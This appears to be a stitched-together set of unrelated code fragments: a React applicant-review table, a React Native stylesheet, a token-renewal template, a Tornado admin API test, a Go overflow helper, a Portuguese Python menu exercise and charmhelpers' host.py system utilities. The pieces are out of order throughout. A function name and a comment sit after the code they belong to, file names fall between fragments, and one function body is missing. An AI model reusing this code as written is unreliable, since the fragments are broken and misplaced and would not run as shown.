extends React.Component{ state = { applicants: this.props.applicants, visible: false, employeeName: "", currentAppliedJobId: "", status: "" } handleAccept = async (id, name, e) => { console.log('handle accept is click with this id: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }) const result = Util.updateJobStatus(currentId, "Accept"); console.log('this is the result: ', result); } handlePending = async (id, name, e) => { console.log('handle pending is click with this id in handle pending: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }); // update the employee's job status to pending const result = Util.updateJobStatus(currentId, "Pending"); console.log('this is the result: ', result); } handleReject = async (id, name, e) => { console.log('handle accept is click with this id: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }); // update the employee's job status to reject const result = Util.updateJobStatus(currentId, "Reject"); console.log('this is the result: ', result); } render(){ console.log('this is the applicants: ', this.state.applicants); console.log('this is the id: ', this.state.currentEmployeeId); return( <div> <Table dataSource={this.state.applicants}> <Column title={I18n.get('Name')} key="name" render = {(text, record) => ( <Link to={"/app/user-profile/"+record.key}> {record.name} </Link> )} /> <Column title={I18n.get("English Level")} dataIndex="englishLevel" key="englishLevel" /> <Column title={I18n.get("Address")} dataIndex="address" key="address" /> <Column style = {{marginTop: "15px"}} title={I18n.get("Status")} key={"status" + Math.random()} dataIndex = "status" /> <Column style = {{marginTop: "15px"}} title ={I18n.get("Decision")} render = {(text, record) => ( <span> <a onClick = {(e) => this.handleAccept(record.appliedJobId, record.name, e) }>Accpet</a> <Divider type="vertical" style={{background: "green"}}/> <a onClick = {(e) => this.handlePending(record.appliedJobId, record.name, e) }>Pending</a> <Divider type="vertical" style={{background: "green"}}/> <a onClick = {(e) => this.handleReject(record.appliedJobId, record.name, e) }>Reject</a> </span> )} /> </Table> <Modal visible={this.state.visible} onOk = {() => { this.setState({ visible: false }) window.location.reload(); }} > <p> Update {this.state.employeeName}'s status successfully </p> </Modal> </div> ) } } export default ApplicantList; {/* <Column title="Tags" dataIndex="tags" key="tags" render={tags => ( <span> {tags.map(tag => <Tag color="blue" key={tag}>{tag}</Tag>)} </span> )} /> <Column title="Action" key="action" render={(text, record) => ( <span> {/* we can send out an email here to inform the user for interview or reject */} // <a href="javascript:;">Invite {record.lastName}</a> // <Divider type="vertical" /> // <a href="javascript:;">Reject</a> // </span> // )} // /> {/* <span> <Button onClick={this.inviteHandler}>Invite for interview</Button> <Divider type="vertical" style={{background: "green"}}/> <Button onClick={this.rejectHandler}>Reject</Button> </span> */}
ApplicantList
main.js
import { StyleSheet } from 'react-native'; const styles = StyleSheet.create({ body: { display: 'flex', alignContent: 'center',
alignItems: 'center' }, exposure: { height: 200 } }) export default styles;
ProjectRegisteredNamedMethods.ts
export function renew<%= capitalizeCustomerSafeName %>AccessToken(): Promise<string> { let renewTokenPromise = new Promise<string>((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.open('POST', '/renewtoken'); xhr.onreadystatechange = handler; xhr.setRequestHeader('Accept', 'application/text'); xhr.send(); function
() { if (this.readyState === this.DONE) { if (this.status === 200) { resolve(this.response); } else { reject(new Error('renewtoken failed with status: [' + this.status + ']')); } } } }); return renewTokenPromise; }
handler
admin_test.py
# -*- coding: utf-8 -*- import unittest from mock import MagicMock, Mock, patch from tornado.gen import Future from .. import TestHandlerBase @unittest.skip("TODO") class AdminAPITest(TestHandlerBase):
def setUp(self): self.client_mock = MagicMock(name="client_mock") self.fake_context = MagicMock( __enter__=Mock(return_value=self.client_mock), __exit__=Mock(return_value=False), ) self.future_mock = Future() super(AdminAPITest, self).setUp() @patch("brew_view.handlers.v1.admin.thrift_context") def test_patch(self, context_mock): context_mock.return_value = self.fake_context self.client_mock.rescanSystemDirectory.return_value = self.future_mock self.future_mock.set_result(None) response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "rescan"}]}', headers={"content-type": "application/json"}, ) self.assertEqual(204, response.code) self.client_mock.rescanSystemDirectory.assert_called_once_with() @patch("brew_view.handlers.v1.admin.thrift_context") def test_patch_exception(self, context_mock): context_mock.return_value = self.fake_context self.client_mock.rescanSystemDirectory.return_value = self.future_mock self.future_mock.set_exception(ValueError()) response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "rescan"}]}', headers={"content-type": "application/json"}, ) self.assertGreaterEqual(response.code, 500) self.client_mock.rescanSystemDirectory.assert_called_once_with() def test_patch_bad_operation(self): response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "fake"}]}', headers={"content-type": "application/json"}, ) self.assertGreaterEqual(response.code, 400) self.assertLess(response.code, 500)
math.go
package utils import ( "math" ) // GetUint32Diff returns the difference between newCount and oldCount
func GetUint32Diff(newCount uint32, oldCount uint32) uint32 { // Catch overflows if newCount < oldCount { return (math.MaxUint32 - oldCount) + newCount } return newCount - oldCount }
// and catches overflows
ex059.py
from time import sleep valor1 = int(input('Digite Primeiro valor: ')) valor2 = int(input('Digite segundo valor: ')) opção = 0 while opção != 5: print(''' [ 1 ] SOMAR [ 2 ] MULTIPLICAR [ 3 ] MAIOR [ 4 ] NOVOS NÚMEROS [ 5 ] SAIR DO PROGRAMA''') opção = int(input('Qual opção você deseja ? ')) if opção == 1: total = valor1 + valor2 print('A soma entre {} + {} é igual a {}'.format(valor1, valor2, total)) elif opção == 2: produto = valor1 * valor2 print('Multiplicando {} x {} é igual a {}'.format(valor1, valor2, produto)) elif opção == 3: if valor1 > valor2: maior = valor1 else: maior = valor2
print('O Maior número entre {} e {} foi o {}'.format(valor1, valor2, maior)) elif opção == 4: print('Por favor Informe os número novamente: ') valor1 = int(input('Digite Primeiro valor: ')) valor2 = int(input('Digite segundo valor: ')) elif opção == 5: print('Finalizando.......') sleep(4) else: print('Opção Invalida! Tente Novamente!! ') print('=-=' * 10) sleep(2) print('Fim do Programa! Volte sempre!!!')
host.py
# Copyright 2014-2015 Canonical Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tools for working with the host system""" # Copyright 2012 Canonical Ltd. # # Authors: # Nick Moffitt <[email protected]> # Matthew Wedgwood <[email protected]> import os import re import pwd import glob import grp import random import string import subprocess import hashlib import functools import itertools import six from contextlib import contextmanager from collections import OrderedDict from .hookenv import log, INFO, DEBUG, local_unit, charm_name from .fstab import Fstab from charmhelpers.osplatform import get_platform __platform__ = get_platform() if __platform__ == "ubuntu": from charmhelpers.core.host_factory.ubuntu import ( service_available, add_new_group, lsb_release, cmp_pkgrevno, CompareHostReleases, ) # flake8: noqa -- ignore F401 for this import elif __platform__ == "centos": from charmhelpers.core.host_factory.centos import ( service_available, add_new_group, lsb_release, cmp_pkgrevno, CompareHostReleases, ) # flake8: noqa -- ignore F401 for this import UPDATEDB_PATH = '/etc/updatedb.conf' def service_start(service_name, **kwargs): """Start a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. The follow- ing example stops the ceph-osd service for instance id=4: service_stop('ceph-osd', id=4) :param service_name: the name of the service to stop :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ return service('start', service_name, **kwargs) def service_stop(service_name, **kwargs): """Stop a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. The follow- ing example stops the ceph-osd service for instance id=4: service_stop('ceph-osd', id=4) :param service_name: the name of the service to stop :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ return service('stop', service_name, **kwargs) def service_restart(service_name, **kwargs): """Restart a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be restarted. The follow- ing example restarts the ceph-osd service for instance id=4: service_restart('ceph-osd', id=4) :param service_name: the name of the service to restart :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for init systems not allowing additional parameters via the commandline (systemd). """ return service('restart', service_name) def service_reload(service_name, restart_on_failure=False, **kwargs): """Reload a system service, optionally falling back to restart if reload fails. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. The follow- ing example restarts the ceph-osd service for instance id=4: service_reload('ceph-osd', id=4) :param service_name: the name of the service to reload :param restart_on_failure: boolean indicating whether to fallback to a restart if the reload fails. :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for init systems not allowing additional parameters via the commandline (systemd). """ service_result = service('reload', service_name, **kwargs) if not service_result and restart_on_failure: service_result = service('restart', service_name, **kwargs) return service_result def service_pause(service_name, init_dir="/etc/init", initd_dir="/etc/init.d", **kwargs): """Pause a system service. Stop it, and prevent it from starting again at boot. :param service_name: the name of the service to pause :param init_dir: path to the upstart init directory :param initd_dir: path to the sysv init directory :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for init systems which do not support key=value arguments via the commandline. """ stopped = True if service_running(service_name, **kwargs): stopped = service_stop(service_name, **kwargs) upstart_file = os.path.join(init_dir, "{}.conf".format(service_name)) sysv_file = os.path.join(initd_dir, service_name) if init_is_systemd(): service('disable', service_name) service('mask', service_name) elif os.path.exists(upstart_file): override_path = os.path.join( init_dir, '{}.override'.format(service_name)) with open(override_path, 'w') as fh: fh.write("manual\n") elif os.path.exists(sysv_file): subprocess.check_call(["update-rc.d", service_name, "disable"]) else: raise ValueError( "Unable to detect {0} as SystemD, Upstart {1} or" " SysV {2}".format( service_name, upstart_file, sysv_file)) return stopped def service_resume(service_name, init_dir="/etc/init", initd_dir="/etc/init.d", **kwargs): """Resume a system service. Reenable starting again at boot. Start the service. :param service_name: the name of the service to resume :param init_dir: the path to the init dir :param initd dir: the path to the initd dir :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ upstart_file = os.path.join(init_dir, "{}.conf".format(service_name)) sysv_file = os.path.join(initd_dir, service_name) if init_is_systemd(): service('unmask', service_name) service('enable', service_name) elif os.path.exists(upstart_file): override_path = os.path.join( init_dir, '{}.override'.format(service_name)) if os.path.exists(override_path): os.unlink(override_path) elif os.path.exists(sysv_file): subprocess.check_call(["update-rc.d", service_name, "enable"]) else: raise ValueError( "Unable to detect {0} as SystemD, Upstart {1} or" " SysV {2}".format( service_name, upstart_file, sysv_file)) started = service_running(service_name, **kwargs) if not started: started = service_start(service_name, **kwargs) return started def service(action, service_name, **kwargs): """Control a system service. :param action: the action to take on the service :param service_name: the name of the service to perform th action on :param **kwargs: additional params to be passed to the service command in the form of key=value. """ if init_is_systemd(): cmd = ['systemctl', action, service_name] else: cmd = ['service', service_name, action] for key, value in six.iteritems(kwargs): parameter = '%s=%s' % (key, value) cmd.append(parameter) return subprocess.call(cmd) == 0 _UPSTART_CONF = "/etc/init/{}.conf" _INIT_D_CONF = "/etc/init.d/{}" def service_running(service_name, **kwargs): """Determine whether a system service is running. :param service_name: the name of the service :param **kwargs: additional args to pass to the service command. This is used to pass additional key=value arguments to the service command line for managing specific instance units (e.g. service ceph-osd status id=2). The kwargs are ignored in systemd services. """ if init_is_systemd(): return service('is-active', service_name) else: if os.path.exists(_UPSTART_CONF.format(service_name)): try: cmd = ['status', service_name] for key, value in six.iteritems(kwargs): parameter = '%s=%s' % (key, value) cmd.append(parameter) output = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('UTF-8') except subprocess.CalledProcessError: return False else: # This works for upstart scripts where the 'service' command # returns a consistent string to represent running # 'start/running' if ("start/running" in output or "is running" in output or "up and running" in output): return True elif os.path.exists(_INIT_D_CONF.format(service_name)): # Check System V scripts init script return codes return service('status', service_name) return False SYSTEMD_SYSTEM = '/run/systemd/system' def init_is_systemd(): """Return True if the host system uses systemd, False otherwise.""" if lsb_release()['DISTRIB_CODENAME'] == 'trusty': return False return os.path.isdir(SYSTEMD_SYSTEM) def adduser(username, password=None, shell='/bin/bash', system_user=False, primary_group=None, secondary_groups=None, uid=None, home_dir=None): """Add a user to the system. Will log but otherwise succeed if the user already exists. :param str username: Username to create :param str password: Password for user; if ``None``, create a system user :param str shell: The default shell for the user :param bool system_user: Whether to create a login or system user :param str primary_group: Primary group for user; defaults to username :param list secondary_groups: Optional list of additional groups :param int uid: UID for user being created :param str home_dir: Home directory for user :returns: The password database entry struct, as returned by `pwd.getpwnam` """ try: user_info = pwd.getpwnam(username) log('user {0} already exists!'.format(username)) if uid: user_info = pwd.getpwuid(int(uid)) log('user with uid {0} already exists!'.format(uid)) except KeyError: log('creating user {0}'.format(username)) cmd = ['useradd'] if uid: cmd.extend(['--uid', str(uid)]) if home_dir: cmd.extend(['--home', str(home_dir)]) if system_user or password is None: cmd.append('--system') else: cmd.extend([ '--create-home', '--shell', shell, '--password', password, ]) if not primary_group: try: grp.getgrnam(username) primary_group = username # avoid "group exists" error except KeyError: pass if primary_group: cmd.extend(['-g', primary_group]) if secondary_groups: cmd.extend(['-G', ','.join(secondary_groups)]) cmd.append(username) subprocess.check_call(cmd) user_info = pwd.getpwnam(username) return user_info def user_exists(username): """Check if a user exists""" try: pwd.getpwnam(username) user_exists = True except KeyError: user_exists = False return user_exists def uid_exists(uid): """Check if a uid exists""" try: pwd.getpwuid(uid) uid_exists = True except KeyError: uid_exists = False return uid_exists def group_exists(groupname): """Check if a group exists""" try: grp.getgrnam(groupname) group_exists = True except KeyError: group_exists = False return group_exists def gid_exists(gid): """Check if a gid exists""" try: grp.getgrgid(gid) gid_exists = True except KeyError: gid_exists = False return gid_exists def add_group(group_name, system_group=False, gid=None): """Add a group to the system Will log but otherwise succeed if the group already exists. :param str group_name: group to create :param bool system_group: Create system group :param int gid: GID for user being created :returns: The password database entry struct, as returned by `grp.getgrnam` """ try: group_info = grp.getgrnam(group_name) log('group {0} already exists!'.format(group_name)) if gid: group_info = grp.getgrgid(gid) log('group with gid {0} already exists!'.format(gid)) except KeyError: log('creating group {0}'.format(group_name)) add_new_group(group_name, system_group, gid) group_info = grp.getgrnam(group_name) return group_info def add_user_to_group(username, group): """Add a user to a group""" cmd = ['gpasswd', '-a', username, group] log("Adding user {} to group {}".format(username, group)) subprocess.check_call(cmd) def chage(username, lastday=None, expiredate=None, inactive=None, mindays=None, maxdays=None, root=None, warndays=None): """Change user password expiry information :param str username: User to update :param str lastday: Set when password was changed in YYYY-MM-DD format :param str expiredate: Set when user's account will no longer be accessible in YYYY-MM-DD format. -1 will remove an account expiration date. :param str inactive: Set the number of days of inactivity after a password has expired before the account is locked. -1 will remove an account's inactivity. :param str mindays: Set the minimum number of days between password changes to MIN_DAYS. 0 indicates the password can be changed anytime. :param str maxdays: Set the maximum number of days during which a password is valid. -1 as MAX_DAYS will remove checking maxdays :param str root: Apply changes in the CHROOT_DIR directory :param str warndays: Set the number of days of warning before a password change is required :raises subprocess.CalledProcessError: if call to chage fails """ cmd = ['chage'] if root: cmd.extend(['--root', root]) if lastday: cmd.extend(['--lastday', lastday]) if expiredate: cmd.extend(['--expiredate', expiredate]) if inactive: cmd.extend(['--inactive', inactive]) if mindays: cmd.extend(['--mindays', mindays]) if maxdays: cmd.extend(['--maxdays', maxdays]) if warndays: cmd.extend(['--warndays', warndays]) cmd.append(username) subprocess.check_call(cmd) remove_password_expiry = functools.partial(chage, expiredate='-1', inactive='-1', mindays='0', maxdays='-1') def rsync(from_path, to_path, flags='-r', options=None, timeout=None): """Replicate the contents of a path""" options = options or ['--delete', '--executability'] cmd = ['/usr/bin/rsync', flags] if timeout: cmd = ['timeout', str(timeout)] + cmd cmd.extend(options) cmd.append(from_path) cmd.append(to_path) log(" ".join(cmd)) return subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('UTF-8').strip() def symlink(source, destination): """Create a symbolic link""" log("Symlinking {} as {}".format(source, destination)) cmd = [ 'ln', '-sf', source, destination, ] subprocess.check_call(cmd) def mkdir(path, owner='root', group='root', perms=0o555, force=False): """Create a directory""" log("Making dir {} {}:{} {:o}".format(path, owner, group, perms)) uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid realpath = os.path.abspath(path) path_exists = os.path.exists(realpath) if path_exists and force: if not os.path.isdir(realpath): log("Removing non-directory file {} prior to mkdir()".format(path)) os.unlink(realpath) os.makedirs(realpath, perms) elif not path_exists: os.makedirs(realpath, perms) os.chown(realpath, uid, gid) os.chmod(realpath, perms) def write_file(path, content, owner='root', group='root', perms=0o444): """Create or overwrite a file with the contents of a byte string.""" uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid # lets see if we can grab the file and compare the context, to avoid doing # a write. existing_content = None existing_uid, existing_gid, existing_perms = None, None, None try: with open(path, 'rb') as target: existing_content = target.read() stat = os.stat(path) existing_uid, existing_gid, existing_perms = ( stat.st_uid, stat.st_gid, stat.st_mode ) except: pass if content != existing_content: log("Writing file {} {}:{} {:o}".format(path, owner, group, perms), level=DEBUG) with open(path, 'wb') as target: os.fchown(target.fileno(), uid, gid) os.fchmod(target.fileno(), perms) if six.PY3 and isinstance(content, six.string_types): content = content.encode('UTF-8') target.write(content) return # the contents were the same, but we might still need to change the # ownership or permissions. if existing_uid != uid: log("Changing uid on already existing content: {} -> {}" .format(existing_uid, uid), level=DEBUG) os.chown(path, uid, -1) if existing_gid != gid: log("Changing gid on already existing content: {} -> {}" .format(existing_gid, gid), level=DEBUG) os.chown(path, -1, gid) if existing_perms != perms: log("Changing permissions on existing content: {} -> {}" .format(existing_perms, perms), level=DEBUG) os.chown(path, perms) def fstab_remove(mp): """Remove the given mountpoint entry from /etc/fstab""" return Fstab.remove_by_mountpoint(mp) def fstab_add(dev, mp, fs, options=None): """Adds the given device entry to the /etc/fstab file""" return Fstab.add(dev, mp, fs, options=options) def mount(device, mountpoint, options=None, persist=False, filesystem="ext3"): """Mount a filesystem at a particular mountpoint""" cmd_args = ['mount'] if options is not None: cmd_args.extend(['-o', options]) cmd_args.extend([device, mountpoint]) try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error mounting {} at {}\n{}'.format(device, mountpoint, e.output)) return False if persist: return fstab_add(device, mountpoint, filesystem, options=options) return True def umount(mountpoint, persist=False): """Unmount a filesystem""" cmd_args = ['umount', mountpoint] try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error unmounting {}\n{}'.format(mountpoint, e.output)) return False if persist: return fstab_remove(mountpoint) return True def mounts(): """Get a list of all mounted volumes as [[mountpoint,device],[...]]""" with open('/proc/mounts') as f: # [['/mount/point','/dev/path'],[...]] system_mounts = [m[1::-1] for m in [l.strip().split() for l in f.readlines()]] return system_mounts def fstab_mount(mountpoint): """Mount filesystem using fstab""" cmd_args = ['mount', mountpoint] try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error unmounting {}\n{}'.format(mountpoint, e.output)) return False return True def file_hash(path, hash_type='md5'): """Generate a hash checksum of the contents of 'path' or None if not found. :param str hash_type: Any hash alrgorithm supported by :mod:`hashlib`, such as md5, sha1, sha256, sha512, etc. """ if os.path.exists(path): h = getattr(hashlib, hash_type)() with open(path, 'rb') as source: h.update(source.read()) return h.hexdigest() else: return None def path_hash(path): """Generate a hash checksum of all files matching 'path'. Standard wildcards like '*' and '?' are supported, see documentation for the 'glob' module for more information. :return: dict: A { filename: hash } dictionary for all matched files. Empty if none found. """ return { filename: file_hash(filename) for filename in glob.iglob(path) } def check_hash(path, checksum, hash_type='md5'): """Validate a file using a cryptographic checksum. :param str checksum: Value of the checksum used to validate the file. :param str hash_type: Hash algorithm used to generate `checksum`. Can be any hash alrgorithm supported by :mod:`hashlib`, such as md5, sha1, sha256, sha512, etc. :raises ChecksumError: If the file fails the checksum """ actual_checksum = file_hash(path, hash_type) if checksum != actual_checksum: raise ChecksumError("'%s' != '%s'" % (checksum, actual_checksum)) class ChecksumError(ValueError): """A class derived from Value error to indicate the checksum failed.""" pass def restart_on_change(restart_map, stopstart=False, restart_functions=None): """Restart services based on configuration files changing This function is used a decorator, for example:: @restart_on_change({ '/etc/ceph/ceph.conf': [ 'cinder-api', 'cinder-volume' ] '/etc/apache/sites-enabled/*': [ 'apache2' ] }) def config_changed(): pass # your code here In this example, the cinder-api and cinder-volume services would be restarted if /etc/ceph/ceph.conf is changed by the ceph_client_changed function. The apache2 service would be restarted if any file matching the pattern got changed, created or removed. Standard wildcards are supported, see documentation for the 'glob' module for more information. @param restart_map: {path_file_name: [service_name, ...] @param stopstart: DEFAULT false; whether to stop, start OR restart @param restart_functions: nonstandard functions to use to restart services {svc: func, ...} @returns result from decorated function """ def wrap(f): @functools.wraps(f) def wrapped_f(*args, **kwargs): return restart_on_change_helper( (lambda: f(*args, **kwargs)), restart_map, stopstart, restart_functions) return wrapped_f return wrap def restart_on_change_helper(lambda_f, restart_map, stopstart=False, restart_functions=None): """Helper function to perform the restart_on_change function. This is provided for decorators to restart services if files described in the restart_map have changed after an invocation of lambda_f(). @param lambda_f: function to call. @param restart_map: {file: [service, ...]} @param stopstart: whether to stop, start or restart a service @param restart_functions: nonstandard functions to use to restart services {svc: func, ...} @returns result of lambda_f() """ if restart_functions is None: restart_functions = {} checksums = {path: path_hash(path) for path in restart_map} r = lambda_f() # create a list of lists of the services to restart restarts = [restart_map[path] for path in restart_map if path_hash(path) != checksums[path]] # create a flat list of ordered services without duplicates from lists services_list = list(OrderedDict.fromkeys(itertools.chain(*restarts))) if services_list: actions = ('stop', 'start') if stopstart else ('restart',) for service_name in services_list: if service_name in restart_functions: restart_functions[service_name](service_name) else: for action in actions: service(action, service_name) return r def pwgen(length=None):
def is_phy_iface(interface): """Returns True if interface is not virtual, otherwise False.""" if interface: sys_net = '/sys/class/net' if os.path.isdir(sys_net): for iface in glob.glob(os.path.join(sys_net, '*')): if '/virtual/' in os.path.realpath(iface): continue if interface == os.path.basename(iface): return True return False def get_bond_master(interface): """Returns bond master if interface is bond slave otherwise None. NOTE: the provided interface is expected to be physical """ if interface: iface_path = '/sys/class/net/%s' % (interface) if os.path.exists(iface_path): if '/virtual/' in os.path.realpath(iface_path): return None master = os.path.join(iface_path, 'master') if os.path.exists(master): master = os.path.realpath(master) # make sure it is a bond master if os.path.exists(os.path.join(master, 'bonding')): return os.path.basename(master) return None def list_nics(nic_type=None): """Return a list of nics of given type(s)""" if isinstance(nic_type, six.string_types): int_types = [nic_type] else: int_types = nic_type interfaces = [] if nic_type: for int_type in int_types: cmd = ['ip', 'addr', 'show', 'label', int_type + '*'] ip_output = subprocess.check_output(cmd).decode('UTF-8') ip_output = ip_output.split('\n') ip_output = (line for line in ip_output if line) for line in ip_output: if line.split()[1].startswith(int_type): matched = re.search('.*: (' + int_type + r'[0-9]+\.[0-9]+)@.*', line) if matched: iface = matched.groups()[0] else: iface = line.split()[1].replace(":", "") if iface not in interfaces: interfaces.append(iface) else: cmd = ['ip', 'a'] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') ip_output = (line.strip() for line in ip_output if line) key = re.compile('^[0-9]+:\s+(.+):') for line in ip_output: matched = re.search(key, line) if matched: iface = matched.group(1) iface = iface.partition("@")[0] if iface not in interfaces: interfaces.append(iface) return interfaces def set_nic_mtu(nic, mtu): """Set the Maximum Transmission Unit (MTU) on a network interface.""" cmd = ['ip', 'link', 'set', nic, 'mtu', mtu] subprocess.check_call(cmd) def get_nic_mtu(nic): """Return the Maximum Transmission Unit (MTU) for a network interface.""" cmd = ['ip', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') mtu = "" for line in ip_output: words = line.split() if 'mtu' in words: mtu = words[words.index("mtu") + 1] return mtu def get_nic_hwaddr(nic): """Return the Media Access Control (MAC) for a network interface.""" cmd = ['ip', '-o', '-0', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8') hwaddr = "" words = ip_output.split() if 'link/ether' in words: hwaddr = words[words.index('link/ether') + 1] return hwaddr @contextmanager def chdir(directory): """Change the current working directory to a different directory for a code block and return the previous directory after the block exits. Useful to run commands from a specificed directory. :param str directory: The directory path to change to for this context. """ cur = os.getcwd() try: yield os.chdir(directory) finally: os.chdir(cur) def chownr(path, owner, group, follow_links=True, chowntopdir=False): """Recursively change user and group ownership of files and directories in given path. Doesn't chown path itself by default, only its children. :param str path: The string path to start changing ownership. :param str owner: The owner string to use when looking up the uid. :param str group: The group string to use when looking up the gid. :param bool follow_links: Also follow and chown links if True :param bool chowntopdir: Also chown path itself if True """ uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid if follow_links: chown = os.chown else: chown = os.lchown if chowntopdir: broken_symlink = os.path.lexists(path) and not os.path.exists(path) if not broken_symlink: chown(path, uid, gid) for root, dirs, files in os.walk(path, followlinks=follow_links): for name in dirs + files: full = os.path.join(root, name) broken_symlink = os.path.lexists(full) and not os.path.exists(full) if not broken_symlink: chown(full, uid, gid) def lchownr(path, owner, group): """Recursively change user and group ownership of files and directories in a given path, not following symbolic links. See the documentation for 'os.lchown' for more information. :param str path: The string path to start changing ownership. :param str owner: The owner string to use when looking up the uid. :param str group: The group string to use when looking up the gid. """ chownr(path, owner, group, follow_links=False) def owner(path): """Returns a tuple containing the username & groupname owning the path. :param str path: the string path to retrieve the ownership :return tuple(str, str): A (username, groupname) tuple containing the name of the user and group owning the path. :raises OSError: if the specified path does not exist """ stat = os.stat(path) username = pwd.getpwuid(stat.st_uid)[0] groupname = grp.getgrgid(stat.st_gid)[0] return username, groupname def get_total_ram(): """The total amount of system RAM in bytes. This is what is reported by the OS, and may be overcommitted when there are multiple containers hosted on the same machine. """ with open('/proc/meminfo', 'r') as f: for line in f.readlines(): if line: key, value, unit = line.split() if key == 'MemTotal:': assert unit == 'kB', 'Unknown unit' return int(value) * 1024 # Classic, not KiB. raise NotImplementedError() UPSTART_CONTAINER_TYPE = '/run/container_type' def is_container(): """Determine whether unit is running in a container @return: boolean indicating if unit is in a container """ if init_is_systemd(): # Detect using systemd-detect-virt return subprocess.call(['systemd-detect-virt', '--container']) == 0 else: # Detect using upstart container file marker return os.path.exists(UPSTART_CONTAINER_TYPE) def add_to_updatedb_prunepath(path, updatedb_path=UPDATEDB_PATH): """Adds the specified path to the mlocate's udpatedb.conf PRUNEPATH list. This method has no effect if the path specified by updatedb_path does not exist or is not a file. @param path: string the path to add to the updatedb.conf PRUNEPATHS value @param updatedb_path: the path the updatedb.conf file """ if not os.path.exists(updatedb_path) or os.path.isdir(updatedb_path): # If the updatedb.conf file doesn't exist then don't attempt to update # the file as the package providing mlocate may not be installed on # the local system return with open(updatedb_path, 'r+') as f_id: updatedb_text = f_id.read() output = updatedb(updatedb_text, path) f_id.seek(0) f_id.write(output) f_id.truncate() def updatedb(updatedb_text, new_path): lines = [line for line in updatedb_text.split("\n")] for i, line in enumerate(lines): if line.startswith("PRUNEPATHS="): paths_line = line.split("=")[1].replace('"', '') paths = paths_line.split(" ") if new_path not in paths: paths.append(new_path) lines[i] = 'PRUNEPATHS="{}"'.format(' '.join(paths)) output = "\n".join(lines) return output def modulo_distribution(modulo=3, wait=30, non_zero_wait=False): """ Modulo distribution This helper uses the unit number, a modulo value and a constant wait time to produce a calculated wait time distribution. This is useful in large scale deployments to distribute load during an expensive operation such as service restarts. If you have 1000 nodes that need to restart 100 at a time 1 minute at a time: time.wait(modulo_distribution(modulo=100, wait=60)) restart() If you need restarts to happen serially set modulo to the exact number of nodes and set a high constant wait time: time.wait(modulo_distribution(modulo=10, wait=120)) restart() @param modulo: int The modulo number creates the group distribution @param wait: int The constant time wait value @param non_zero_wait: boolean Override unit % modulo == 0, return modulo * wait. Used to avoid collisions with leader nodes which are often given priority. @return: int Calculated time to wait for unit operation """ unit_number = int(local_unit().split('/')[1]) calculated_wait_time = (unit_number % modulo) * wait if non_zero_wait and calculated_wait_time == 0: return modulo * wait else: return calculated_wait_time def install_ca_cert(ca_cert, name=None): """ Install the given cert as a trusted CA. The ``name`` is the stem of the filename where the cert is written, and if not provided, it will default to ``juju-{charm_name}``. If the cert is empty or None, or is unchanged, nothing is done. """ if not ca_cert: return if not isinstance(ca_cert, bytes): ca_cert = ca_cert.encode('utf8') if not name: name = 'juju-{}'.format(charm_name()) cert_file = '/usr/local/share/ca-certificates/{}.crt'.format(name) new_hash = hashlib.md5(ca_cert).hexdigest() if file_hash(cert_file) == new_hash: return log("Installing new CA cert at: {}".format(cert_file), level=INFO) write_file(cert_file, ca_cert) 